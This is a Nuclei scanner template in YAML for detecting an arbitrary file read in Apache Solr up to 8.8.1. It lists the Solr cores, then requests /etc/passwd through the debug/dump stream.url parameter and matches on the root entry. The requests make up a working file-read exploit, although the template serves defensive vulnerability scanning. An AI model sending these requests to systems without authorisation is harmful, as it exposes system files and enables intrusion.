nuclei-templates/vulnerabilities/apache/apache-solr-file-read.yaml

44 lines
1.0 KiB
YAML
Raw Normal View History

2021-04-23 10:19:45 +00:00
id: apache-solr-file-read
info:
name: Apache Solr <= 8.8.1 Arbitrary File Read
author: DhiyaneshDk
severity: high
tags: apache,solr,lfi
reference:
- https://twitter.com/Al1ex4/status/1382981479727128580
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
- https://twitter.com/sec715/status/1373472323538362371
requests:
- raw:
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
2021-08-09 16:28:28 +00:00
extractors:
- type: regex
2021-08-09 16:28:28 +00:00
internal: true
name: core
group: 1
2021-08-09 16:28:28 +00:00
regex:
- '"name"\:"(.*?)"'
2021-08-09 16:28:28 +00:00
matchers-condition: and
matchers:
2021-08-09 16:28:28 +00:00
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"